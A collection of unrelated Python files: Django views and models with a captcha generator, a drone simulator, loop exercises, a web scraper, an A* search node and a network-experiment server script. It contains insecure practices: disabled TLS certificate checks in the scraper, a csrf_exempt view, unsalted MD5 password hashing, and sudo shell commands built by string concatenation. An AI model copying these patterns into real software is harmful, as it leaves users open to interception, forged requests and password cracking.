else:\n\n\n\n form = AssetLifeForm(instance=company)\n\n\n return save_assetLife_form(request, form, 'cmms/asset_life/partialAssetLifeUpdate.html',woId.id)\n################################################################### ###################################################################\n@csrf_exempt\ndef saveUpdate_assetLife_form(request, form, template_name,woId=None,assetStatus=None):\n data = dict()\n\n\n if (request.method == 'POST'):\n print(request.POST)\n print(\"here is good\")\n\n if form.is_valid():\n\n form.save()\n data['form_is_valid'] = True\n\n books = AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n else:\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(form.errors)\n\n\n\n\n\n context = {'form': form,'assetStatus':assetStatus}\n data['html_assetLife_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n","sub_path":"cmms/views/assetlifeview.py","file_name":"assetlifeview.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383690271","text":"#!/usr/bin/python3\n\nfrom insane.Parser import Parser\nfrom insane.Core import Core\n\ndef main():\n parser = Parser(\"sample/little.in\")\n parser.display()\n\n # create the environment\n core = Core(parser.getRows(), parser.getColumns(), parser.getDrones(), parser.getDeadline(), parser.getMaxDroneLoad())\n\n # create the products type\n weights = parser.getWeights()\n for weight in weights:\n core.addProductType(int(weight))\n\n # create warehouses with products\n warehouses = parser.getWarehouses()\n for id, warehouse in warehouses.items():\n wareHouseId = core.addWareHouse(int(warehouse[0][0]), int(warehouse[0][1]))\n i = 0\n for product in warehouse[1]:\n core.addProductWareHouse(wareHouseId, i, product)\n i += 1\n\n orders = parser.getOrders()\n for id, order in orders.items():\n orderId = core.addOrder(order[0][0], order[0][1])\n for product in order[2]:\n core.addItemOrder(orderId, int(product), 1)\n\n core.printAll()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211854720","text":"# print all integers from 0 to 150\n\nfor x in range(151):\n print(x)\n\n\n# Print all the multiples of 5 from 5 to 1,000\n\nfor i in range(5,1001,5):\n print(i)\n\n\n#Print integers 1 to 100. if divisible by 5, print \"Coding\" instead. If divisble by 10, print \"Coding Dojo\"\n\nfor i in range(101):\n if i % 5 == 0:\n print(\"Coding\")\n if i % 10 == 0:\n print(\"Coding Dojo\")\n else:\n print(i)\n\n\n# add odd integers from 0 to 500,000 and print the final sum \n\nsum = 0\n\nfor i in range(1,500001,2):\n sum += i\n\nprint(sum)\n\n\n# print postive numbers starting at 2018, counting down by fours. \n\nfor i in range(2018, 0, -4):\n print(i)\n\n# Set three variables: lowNum, highNum, mult. 
\n# Starting at lowNum and going through highNum, print only the integers that are a multiple of mult.\n# For example, if lowNum = 2, highNum = 9, and mult = 3, the loop should print 3, 6, 9 (on successive lines)\n\nlowNum = 2\nhighNum = 9\nmult = 3\n\nfor i in range(lowNum,highNum+1,1):\n if i % mult == 0:\n print(i)\n","sub_path":"python_stack/python/fundamentals/for_loop_basic1.py","file_name":"for_loop_basic1.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444182548","text":"#! /usr/local/bin/python2.7\r\n\r\nf = open(\"/root/oasis_provisioning_bot/oasis_log.txt\",\"r\")\r\n\r\n\r\nfor line in (f.readlines() [-10:]):\r\n print (line)\r\n \r\n\r\n\r\n\r\n\r\n\r\nquit()\r\nprint(f.read(-1))\r\nquit()\r\n\r\nfor line in f.read:\r\n print (type(line))\r\n quit()\r\n\r\n\r\n\r\n\r\n# cat = f.readlines()\r\n# for i in cat[-2]:\r\n # print(i)\r\n \r\n# print(len(cat))\r\n \r\n","sub_path":"tail_last10_lines.py","file_name":"tail_last10_lines.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120345430","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport ssl\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ncnt = 0\nnamelnks = []\nurl = \"http://py4e-data.dr-chuck.net/known_by_Beinn.html\"\nwhile cnt < 7:\n html = urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, \"html.parser\")\n namelnks = []\n tags = soup('a')\n for tag in tags:\n namelnks.append(tag.get('href', None))\n cnt += 1\n url = namelnks[17]\n print(url)","sub_path":"OnlineClasses/Programming for Everybody/Class3/ex12_6.py","file_name":"ex12_6.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396340137","text":"import hashlib\nimport re\n\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django import forms\n\nimport os\nimport random\n\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL.ImageDraw import Draw\nfrom PIL.ImageFont import truetype\n\n# Create your models here.\nclass Subject(models.Model):\n \"\"\"学科\"\"\"\n no = models.IntegerField(primary_key=True, verbose_name='编号')\n name = models.CharField(max_length=20, verbose_name='名称')\n intro = models.CharField(max_length=511, default='', verbose_name='介绍')\n create_date = models.DateField(null=True, verbose_name='成立日期')\n is_hot = models.BooleanField(default=False, verbose_name='是否热门')\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = 'tb_subject'\n verbose_name = '学科'\n verbose_name_plural = '学科'\n\n\nclass Teacher(models.Model):\n \"\"\"老师\"\"\"\n no = models.AutoField(primary_key=True, verbose_name='编号')\n name = models.CharField(max_length=20, verbose_name='姓名')\n detail = models.CharField(max_length=1023, default='', blank=True, verbose_name='详情')\n photo = models.CharField(max_length=1023, default='', verbose_name='照片')\n good_count = models.IntegerField(default=0, verbose_name='好评数')\n bad_count = models.IntegerField(default=0, verbose_name='差评数')\n subject = models.ForeignKey(to=Subject, on_delete=models.PROTECT, db_column='sno', verbose_name='所属学科')\n\n class Meta:\n db_table = 'tb_teacher'\n verbose_name = '老师'\n verbose_name_plural = '老师'\n\nclass User(models.Model):\n 
\"\"\"用户\"\"\"\n no = models.AutoField(primary_key=True, verbose_name='编号')\n username = models.CharField(max_length=20, unique=True, verbose_name='用户名')\n password = models.CharField(max_length=32, verbose_name='密码')\n regdate = models.DateTimeField(auto_now_add=True, verbose_name='注册时间')\n\n class Meta:\n db_table = 'tb_user'\n verbose_name_plural = '用户'\n\n\nUSERNAME_PATTERN = re.compile(r'\\w{4,20}')\n\n\ndef to_md5_hex(message):\n return hashlib.md5(message.encode()).hexdigest()\n\nclass RegisterForm(forms.ModelForm):\n repassword = forms.CharField(min_length=8, max_length=20)\n\n def clean_username(self):\n username = self.cleaned_data['username']\n if not USERNAME_PATTERN.fullmatch(username):\n raise ValidationError('用户名由字母、数字和下划线构成且长度为4-20个字符')\n return username\n\n def clean_password(self):\n password = self.cleaned_data['password']\n if len(password) < 8 or len(password) > 20:\n raise ValidationError('无效的密码,密码长度为8-20个字符')\n return to_md5_hex(self.cleaned_data['password'])\n\n def clean_repassword(self):\n repassword = to_md5_hex(self.cleaned_data['repassword'])\n if repassword != self.cleaned_data['password']:\n raise ValidationError('密码和确认密码不一致')\n return repassword\n\n class Meta:\n model = User\n exclude = ('no', 'regdate')\n\n\nclass Bezier(object):\n \"\"\"贝塞尔曲线\"\"\"\n\n def __init__(self):\n self.tsequence = tuple([t / 20.0 for t in range(21)])\n self.beziers = {}\n\n def make_bezier(self, n):\n \"\"\"绘制贝塞尔曲线\"\"\"\n try:\n return self.beziers[n]\n except KeyError:\n combinations = pascal_row(n - 1)\n result = []\n for t in self.tsequence:\n tpowers = (t ** i for i in range(n))\n upowers = ((1 - t) ** i for i in range(n - 1, -1, -1))\n coefs = [c * a * b for c, a, b in zip(combinations,\n tpowers, upowers)]\n result.append(coefs)\n self.beziers[n] = result\n return result\n\n\nclass Captcha(object):\n \"\"\"验证码\"\"\"\n\n def __init__(self, width, height, fonts=None, color=None):\n self._image = None\n self._fonts = fonts if fonts else \\\n [os.path.join(os.path.dirname(__file__), 'fonts', font)\n for font in ['ArialRB.ttf', 'ArialNI.ttf', 'Georgia.ttf', 'Kongxin.ttf']]\n self._color = color if color else random_color(0, 200, random.randint(220, 255))\n self._width, self._height = width, height\n\n @classmethod\n def instance(cls, width=200, height=75):\n prop_name = f'_instance_{width}_{height}'\n if not hasattr(cls, prop_name):\n setattr(cls, prop_name, cls(width, height))\n return getattr(cls, prop_name)\n\n def background(self):\n \"\"\"绘制背景\"\"\"\n Draw(self._image).rectangle([(0, 0), self._image.size],\n fill=random_color(230, 255))\n\n def smooth(self):\n \"\"\"平滑图像\"\"\"\n return self._image.filter(ImageFilter.SMOOTH)\n\n def curve(self, width=4, number=6, color=None):\n \"\"\"绘制曲线\"\"\"\n dx, height = self._image.size\n dx /= number\n path = [(dx * i, random.randint(0, height))\n for i in range(1, number)]\n bcoefs = Bezier().make_bezier(number - 1)\n points = []\n for coefs in bcoefs:\n points.append(tuple(sum([coef * p for coef, p in zip(coefs, ps)])\n for ps in zip(*path)))\n Draw(self._image).line(points, fill=color if color else self._color, width=width)\n\n def noise(self, number=50, level=2, color=None):\n \"\"\"绘制扰码\"\"\"\n width, height = self._image.size\n dx, dy = width / 10, height / 10\n width, height = width - dx, height - dy\n draw = Draw(self._image)\n for i in range(number):\n x = int(random.uniform(dx, width))\n y = int(random.uniform(dy, height))\n draw.line(((x, y), (x + level, y)),\n fill=color if color else self._color, width=level)\n\n def 
text(self, captcha_text, fonts, font_sizes=None, drawings=None, squeeze_factor=0.75, color=None):\n \"\"\"绘制文本\"\"\"\n color = color if color else self._color\n fonts = tuple([truetype(name, size)\n for name in fonts\n for size in font_sizes or (65, 70, 75)])\n draw = Draw(self._image)\n char_images = []\n for c in captcha_text:\n font = random.choice(fonts)\n c_width, c_height = draw.textsize(c, font=font)\n char_image = Image.new('RGB', (c_width, c_height), (0, 0, 0))\n char_draw = Draw(char_image)\n char_draw.text((0, 0), c, font=font, fill=color)\n char_image = char_image.crop(char_image.getbbox())\n for drawing in drawings:\n d = getattr(self, drawing)\n char_image = d(char_image)\n char_images.append(char_image)\n width, height = self._image.size\n offset = int((width - sum(int(i.size[0] * squeeze_factor)\n for i in char_images[:-1]) -\n char_images[-1].size[0]) / 2)\n for char_image in char_images:\n c_width, c_height = char_image.size\n mask = char_image.convert('L').point(lambda i: i * 1.97)\n self._image.paste(char_image,\n (offset, int((height - c_height) / 2)),\n mask)\n offset += int(c_width * squeeze_factor)\n\n @staticmethod\n def warp(image, dx_factor=0.3, dy_factor=0.3):\n \"\"\"图像扭曲\"\"\"\n width, height = image.size\n dx = width * dx_factor\n dy = height * dy_factor\n x1 = int(random.uniform(-dx, dx))\n y1 = int(random.uniform(-dy, dy))\n x2 = int(random.uniform(-dx, dx))\n y2 = int(random.uniform(-dy, dy))\n warp_image = Image.new(\n 'RGB',\n (width + abs(x1) + abs(x2), height + abs(y1) + abs(y2)))\n warp_image.paste(image, (abs(x1), abs(y1)))\n width2, height2 = warp_image.size\n return warp_image.transform(\n (width, height),\n Image.QUAD,\n (x1, y1, -x1, height2 - y2, width2 + x2, height2 + y2, width2 - x2, -y1))\n\n @staticmethod\n def offset(image, dx_factor=0.1, dy_factor=0.2):\n \"\"\"图像偏移\"\"\"\n width, height = image.size\n dx = int(random.random() * width * dx_factor)\n dy = int(random.random() * height * dy_factor)\n offset_image = Image.new('RGB', (width + dx, height + dy))\n offset_image.paste(image, (dx, dy))\n return offset_image\n\n @staticmethod\n def rotate(image, angle=25):\n \"\"\"图像旋转\"\"\"\n return image.rotate(random.uniform(-angle, angle),\n Image.BILINEAR, expand=1)\n\n def generate(self, captcha_text='', fmt='PNG'):\n \"\"\"生成验证码(文字和图片)\"\"\"\n self._image = Image.new('RGB', (self._width, self._height), (255, 255, 255))\n self.background()\n self.text(captcha_text, self._fonts,\n drawings=['warp', 'rotate', 'offset'])\n self.curve()\n self.noise()\n self.smooth()\n image_bytes = BytesIO()\n self._image.save(image_bytes, format=fmt)\n return image_bytes.getvalue()\n\n\ndef pascal_row(n=0):\n \"\"\"生成Pascal三角第n行\"\"\"\n result = [1]\n x, numerator = 1, n\n for denominator in range(1, n // 2 + 1):\n x *= numerator\n x /= denominator\n result.append(x)\n numerator -= 1\n if n & 1 == 0:\n result.extend(reversed(result[:-1]))\n else:\n result.extend(reversed(result))\n return result\n\n\ndef random_color(start=0, end=255, opacity=255):\n \"\"\"获得随机颜色\"\"\"\n red = random.randint(start, end)\n green = random.randint(start, end)\n blue = random.randint(start, end)\n if opacity is None:\n return red, green, blue\n return red, green, blue, opacity\n\n# class LoginForm(forms.Form):\n# username = forms.CharField(min_length=4, max_length=20)\n# password = forms.CharField(min_length=8, max_length=20)\n# captcha = forms.CharField(min_length=4, max_length=4)\n#\n# def clean_username(self):\n# username = self.cleaned_data['username']\n# if not 
USERNAME_PATTERN.fullmatch(username):\n# raise ValidationError('无效的用户名')\n# return username\n#\n# def clean_password(self):\n# return to_md5_hex(self.cleaned_data['password'])","sub_path":"Django_practice/hellodjango/vote/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283128449","text":"import utils\nimport functools\n\n\n@functools.total_ordering\nclass Node:\n \"\"\"\n Node class\n\n for using search tree and contains state and the action from last move.\n the cost g and f (g + heuristic) are stored as well!\n\n built for project pA of COMP30024\n Authors: Xinyao Niu (900721), Maoting Zuo (901116)\n Team Name: VanGame\n \"\"\"\n\n def __init__(self, pre_node: 'node' = None, state: dict = None,\n transition_action: str = \"\", g=0) -> None:\n \"\"\"\n constructor\n * pre_node -- parent node on the tree (None by default)\n * state -- current state (None by default)\n * transition_action -- output string for this node, will be used in backtrace\n * g -- cost so far to achieve this state\n \"\"\"\n\n # string of the action that how state are transfer from last node to this node\n self.transition_action = transition_action\n self.pre_node = pre_node\n self.g = g\n self.state = state\n\n # calculate heuristic when initializing the node\n self.f = self.g + self.heuristic(self.state)\n\n def __lt__(self, other):\n \"\"\"\n function override for using comparision operators.\n \"\"\"\n return self.f < other.f\n\n def __eq__(self, other):\n \"\"\"\n function override for using comparision operators.\n \"\"\"\n\n return self.f == other.f and self.g == other.g and self.state == other.state\n\n @staticmethod\n def heuristic(state):\n \"\"\"\n heuristic function\n \"\"\"\n\n # sum of all move/2 + jump from the position of\n # each piece to their closest goal\n # (proof of admissible refer to the report)\n h = 0\n\n for p in state[\"players\"]:\n\n min_distance_from_goal = utils.COST[p]\n h = h + min_distance_from_goal\n\n return h\n\n def _newNode(self, old_coord: tuple, new_coord: tuple = None, transition_action=\"\"):\n \"\"\"\n private (well..)function for generating new nodes\n \"\"\"\n\n new_state = {\"players\": self.state[\"players\"].copy()}\n\n # remove old position\n # if taken EXIT action, then remove it without appending new position\n new_state[\"players\"].remove(old_coord)\n\n # Only append when all the piece has valid position in the next state\n if new_coord:\n new_state[\"players\"].add(new_coord)\n\n new_state[\"goals\"] = self.state[\"goals\"]\n new_state[\"blocks\"] = self.state[\"blocks\"]\n\n new_node = Node(self, new_state, g=(self.g + 1),\n transition_action=transition_action)\n\n return new_node\n\n def expand(self) -> list:\n \"\"\"\n this method are trying to find all the possible movement\n (except its parent node state) for all the available pieces on the\n board as next possible states based on the current position\n of pieces, and regard them as the child of this node. 
Notice\n        that we assume moving back and forth does not give us an\n        optimal solution.\n        \"\"\"\n\n        # delta x and y from any position to its neighbourhood (move)\n        move = [\n            [0, -1],\n            [1, -1],\n            [1, 0],\n            [0, 1],\n            [-1, 1],\n            [-1, 0]\n        ]\n\n        # delta x and y from any position to its possible move (jump)\n        jump = [\n            [0, -2],\n            [2, -2],\n            [2, 0],\n            [0, 2],\n            [-2, 2],\n            [-2, 0]\n        ]\n\n        successors = []\n        max_directions = 6\n\n        for piece in self.state[\"players\"]:\n\n            # same position but different tuple\n            tmpPiece = piece + ()\n\n            # if piece is on the goal then exit\n            if tmpPiece in self.state[\"goals\"]:\n                s = self._newNode(tmpPiece,\n                                  transition_action=\"EXIT from \" + str(tmpPiece) + \".\")\n                successors.append(s)\n                continue\n\n            # check position of next possible moves\n            # one direction at a time, check both move and jump\n            for i in range(max_directions):\n\n                # by move\n                # 1 step position in this direction\n                check_move = (tmpPiece[0] + move[i][0],\n                              tmpPiece[1] + move[i][1])\n\n                if (not (check_move in self.state[\"blocks\"] or\n                         check_move in self.state[\"players\"])) \\\n                        and utils.piece_valid(check_move):\n\n                    # if can reach this direction one step by move\n                    # create new node\n                    s = self._newNode(tmpPiece, check_move,\n                                      transition_action=\"MOVE from \" + str(tmpPiece)\n                                      + \" to \" + str(check_move) + \".\",\n                                      )\n                    successors.append(s)\n                else:\n                    # by jump (if 1 step move in this direction can not\n                    # be reached)\n                    # 2 step position in this direction\n                    check_jump = (tmpPiece[0] + jump[i][0],\n                                  tmpPiece[1] + jump[i][1])\n\n                    if (not (check_jump in self.state[\"blocks\"] or\n                             check_jump in self.state[\"players\"])) and \\\n                            utils.piece_valid(check_jump):\n                        # if can reach this direction one step by jump\n                        # create new node\n                        s = self._newNode(tmpPiece, check_jump,\n                                          transition_action=\"JUMP from \" + str(tmpPiece)\n                                          + \" to \" + str(check_jump) + \".\",\n                                          )\n                        successors.append(s)\n\n        return successors\n\n    def goal_test(self):\n        \"\"\"\n        determine if the current state is the goal state\n        \"\"\"\n        return len(self.state[\"players\"]) == 0\n\n    def __str__(self):\n        \"\"\"\n        to string, will be invoked when printing the node\n        \"\"\"\n\n        state_board = {}\n\n        for p in self.state[\"players\"]:\n            state_board[p] = \"*p*\"\n\n        for l in self.state[\"goals\"]:\n            if l in state_board:\n                state_board[l] = state_board[l] + \"*g*\"\n            else:\n                state_board[l] = \"*g*\"\n\n        for o in self.state[\"blocks\"]:\n            if o in state_board:\n                state_board[o] = state_board[o] + \"*b*\"\n            else:\n                state_board[o] = \"*b*\"\n\n        utils.print_board(state_board, message=self.transition_action + str(self.heuristic(self.state)), debug=True)\n\n        return self.transition_action\n\n    # make sure that when print a list, the __str__ will also be invoked\n    # only for debug purpose\n    __repr__ = __str__\n","sub_path":"Project2/HardCode2/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187003813","text":"class Solution:\n    def canPartition(self, nums):\n        # A greedy scan over sorted values misses valid partitions, e.g.\n        # [8, 7, 6, 5, 4, 2]: 16 = 8 + 6 + 2, but greedily taking 8 + 7 = 15\n        # blocks it. Use the classic subset-sum DP over reachable sums instead.\n        total = sum(nums)\n        if total % 2 == 1:\n            return False\n        target = total // 2\n        reachable = [True] + [False] * target\n        for num in nums:\n            # Iterate downwards so each number is used at most once.\n            for s in range(target, num - 1, -1):\n                if reachable[s - num]:\n                    reachable[s] = True\n        if reachable[target]:\n            return True\n        return 
False\n","sub_path":"416.Partition_Equal_Subset_Sum/Solution_python.py","file_name":"Solution_python.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461251636","text":"#!/usr/bin/env python3\nimport socket\nimport os, sys, time\nimport subprocess\nimport _thread as thread\nfrom yattag import Doc\nsys.path.append(\"../config/\")\nfrom setup import * \nfrom os import path\nfrom datetime import date\nimport datetime\n\nstart_server=0\nexp_count=0\nfilename=\"\"\np=1\nprint('Delete all files in '+data_dir)\ncmd = 'rm -rf '+data_dir+'/* '\nos.system(cmd) \n\nprint('1. exe_dir is ',exe_dir)\nprint('2. data_dir is ',data_dir)\nprint('3. result_dir is ',result_dir)\nprint('4. tmp_dir is ',tmp_dir)\n\nif not os.path.exists(data_dir+'/'):\n os.makedirs(data_dir+'/')\nif not os.path.exists(result_dir+'/'):\n os.makedirs(result_dir+'/')\nif not os.path.exists(tmp_dir+'/'):\n os.makedirs(tmp_dir+'/')\nif not os.path.exists(backup_dir+'/'):\n os.makedirs(backup_dir+'/')\n\nif(len(sys.argv)<2):\n print (\"Usage error: --#proto\")\n exit()\n# # server 2\nwww_name = 'mydata'\nsu = 'sudo'\n\nproto=sys.argv[1]\n\ntcp_cc_list = ['reno','cubic','bbr','vegas','westwood','exll','pcc']\n\nif tcp_cc_list.count(proto) > 0 :\n # cmd = 'python3 server_tcp_cc.py'\n # os.system(cmd)\n\n print('change tcp_congestion_control to '+proto)\n cmd = su+' sysctl -w net.ipv4.tcp_congestion_control='+proto\n os.system(cmd)\n\n # if proto == 'bbr': cmd=\n # else:\n\n result = subprocess.check_output(cmd, shell=True)\n temp_proto = result.decode(\"utf-8\") \n proto=temp_proto.split()[2]\n print(\"protocol is \"+proto)\n # exp_num = 0\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, 5000))\n while True:\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr[0],addr[1])\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n if(\"Can I start\" in data.decode(\"utf-8\")):\n decode_data = data.decode(\"utf-8\")\n decode_data_group = decode_data.split()\n print(decode_data_group)\n ClientState = decode_data_group[4]\n ClientIP = decode_data_group[5] # background|foreground\n ClientStreams = int(decode_data_group[6])\n exp_num=int(decode_data_group[7])\n finish_num=int(decode_data_group[8])\n x=\"%.0f\"%time.time()\n if(b\"download\" in data):\n filename=\"Server_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_download_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n print(filename)\n if(b\"upload\" in data):\n filename=\"Server_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_upload_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n print(filename)\n # TODO : run tcp_probe (sudo cat /proc/net/tcpprobe > data 2>&1)\n tcp_probe_filename = \"tcpprobe_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_download_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n cmd_tcp_probe = su+\" cat /proc/net/tcpprobe > \"+data_dir+'/'+tcp_probe_filename+\" 2>&1\"\n subprocess.Popen(cmd_tcp_probe,shell=True)\n cmd=\"iperf3 -s -p \"+str(PORT)+\" -V -i \"+str(interval)+\" -f m > \"+tmp_dir+'/'+filename # run iperf3\n print (\"cmd is:\",cmd) \n subprocess.Popen(cmd,shell=True)\n conn.sendall(b\"yes\")\n #res=p.communicate()\n #print (res)\n print (data,\"\\tLaunched the command\")\n if(\"Done\" in data.decode(\"utf-8\")):\n 
print (\"Clinet is done with iperf\",data)\n exp_count+=1\n cmd=su+\" kill $(ps aux | grep iperf3 | awk {'print $2'} )\"\n print (\"cmd is:\",cmd)\n os.system(cmd)\n cmd_2=su+\" kill $(ps aux | grep tcpprobe | awk {'print $2'} )\"\n print (\"cmd is:\",cmd_2)\n os.system(su+' killall -9 cat')\n os.system(cmd_2)\n #create the parsed output\n write_file=\"p\"+filename\n cmd=\"./server_parser.py \"+tmp_dir+'/'+filename+\" \"+str(interval)+\" \"+data_dir+'/'+write_file\n print (\"cmd is:\",cmd)\n os.system(cmd)\n #break\n #exit() \n if finish_num==1:\n print('finish_num is ', finish_num)\n p = 0\n else:\n print(data) \n if p==0:\n print('p==0')\n break\n \n except KeyboardInterrupt:\n pass \n\n # run = exp_count + 1\n print('\\n Stop Here! Total experiment number: '+ str(exp_count))\n print('Working on plot and index.html files.... wait....\\n')\n # sleep(10)\n # exp_count=2\n # run=2\n\n # draw with iperf3 and tcpprobe data\n cmd = 'python3 ' + exe_dir+'/' + 'plot_control.py '+str(duration)+' '+ClientState+' '+str(ClientStreams)+' '+str(exp_count)+' '+str(proto)\n print(\"cmd is \"+cmd)\n os.system(cmd)\n\n\nelse:\n # Sprout\n if proto == 'sprout':\n # run server\n # cmd = 'python3 run_sprout.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n rtt_filename=\"sprout_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n tput_filename=\"sprout_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n cc_repo = path.join(base_dir, 'sprout')\n model = path.join(cc_repo, 'src', 'examples', 'sprout.model')\n src = path.join(cc_repo, 'src', 'examples', 'sproutbt2')\n # sproutbt2\n tmp_file_name = data_dir+'/'+rtt_filename\n rtt_command = src+' 2>&1 | tee ' +tmp_file_name\n print(rtt_command)\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n s_time = \"%.0f\"%time.time()\n time.sleep(10)\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration+30 : # 15s: initial booting time \n os.system(su+' killall -9 tcpdump')\n os.system(su+' killall -9 cat')\n os.system(su+' killall -9 sproutbt2')\n # tar_cmp = 'tar -cvf '+'~/sprout.tar.gz '+data_dir+'/*'\n # os.system(tar_cmp)\n plot_file = '../client/new_plot_from_udp.py'\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n for dir in dir_list:\n if dir.find('tput') >= 0:\n tput = dir\n if dir.find('rtt')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+rtt+' '+data_dir+'/sprout_figure'+' '+'sprout'\n print(cmd)\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd)\n\n break\n else:\n c_time = \"%.0f\"%time.time()\n # Verus\n elif proto == 'verus':\n # # run server\n # cmd = 'python3 run_verus.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n result_dir_name=\"verus_\"+str(today)+\"_\"+str(x)\n\n # ./verus_server -name test -p 60001 -t 30\n cc_repo = path.join(base_dir, 'verus')\n src = path.join(cc_repo, 'src', 'verus_server')\n verus_result_dir = path.join(src, result_dir_name)\n new_verus_result_dir = path.join(data_dir, result_dir_name)\n\n cmd = 'mkdir ' + new_verus_result_dir\n os.system(cmd)\n\n tput_filename=\"verus_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n 
rtt_filename=\"verus_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+result_dir_name+'/'+tput_filename\n print(tput_cmd)\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n\n s_time = \"%.0f\"%time.time()\n # verus_server result: Losses.out Receiver.out Verus.out\n rtt_command = src+' -name ' +result_dir_name +' -p 9001 -t '+ str(duration)\n p1 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n\n duration_1 = int(duration) + 5\n time.sleep(duration_1)\n\n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration : # 15s: initial booting time \n os.system(su+' killall -9 tcpdump')\n # os.system(tar_cmp)\n break\n else:\n c_time = \"%.0f\"%time.time()\n\n time.sleep(15)\n cmd = 'cp ' +result_dir_name+'/* '+new_verus_result_dir\n os.system(cmd)\n\n verus_plot_file = '../client/plot_verus.py'\n cmd = 'python3 '+verus_plot_file+' '+new_verus_result_dir+'/Receiver.out -o '+new_verus_result_dir\n os.system(cmd)\n\n plot_file = '../client/new_plot_from_udp.py'\n dir_list = os.listdir(new_verus_result_dir)\n # dir = dir_list[0]\n print(dir_list)\n for dir in dir_list:\n if dir.find('verus_tput_')>= 0:\n tput = dir\n if dir.find('Receiver.out')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+new_verus_result_dir+'/'+tput+' '+new_verus_result_dir+'/'+rtt+' '+new_verus_result_dir+'/verus_figure '+proto\n print(cmd)\n os.system(cmd)\n\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+new_verus_result_dir+'/* '+ new_result_dir \n os.system(cmd) \n\n\n #COPA\n elif proto == 'copa':\n # # run server\n # cmd = 'python3 run_copa.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n tput_filename=\"copa_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n rtt_filename=\"copa_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n # 